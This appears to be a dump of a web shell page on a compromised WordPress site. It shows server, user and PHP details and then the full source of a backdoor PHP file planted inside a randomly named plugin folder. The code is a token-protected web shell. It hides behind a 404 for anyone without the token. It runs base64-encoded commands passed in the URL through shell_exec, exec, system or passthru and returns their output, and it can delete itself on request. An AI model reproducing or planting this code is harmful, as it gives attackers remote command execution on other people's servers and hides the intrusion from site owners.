WS_OK_7.4.33 HEX
HEX
Server: nginx/1.21.4
System: Linux v12674 6.8.0-85-generic #85-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 18 15:26:59 UTC 2025 x86_64
User: endtheignorance (1014)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v12674/lcahouston/public_html/wp-content/plugins/w2sa02eb191c127/direct.php
<?php
if (!hash_equals('1653ea93b0eade7208bd132eaaed4e65', (string)($_GET['t'] ?? ''))) { http_response_code(404); exit; }
if (isset($_GET['rm'])) { $d = __DIR__; foreach (glob($d . '/*') as $f) { @unlink($f); } @rmdir($d); echo 'W2S::REMOVED::END'; exit; }
$c = base64_decode((string)($_GET['c'] ?? '')) . ' 2>&1'; $o = 'NO_EXEC';
if (function_exists('shell_exec')) { $o = shell_exec($c); }
elseif (function_exists('exec')) { exec($c, $r); $o = implode("\n", $r); }
elseif (function_exists('system')) { ob_start(); system($c); $o = ob_get_clean(); }
elseif (function_exists('passthru')) { ob_start(); passthru($c); $o = ob_get_clean(); }
echo 'W2S::' . $o . '::END';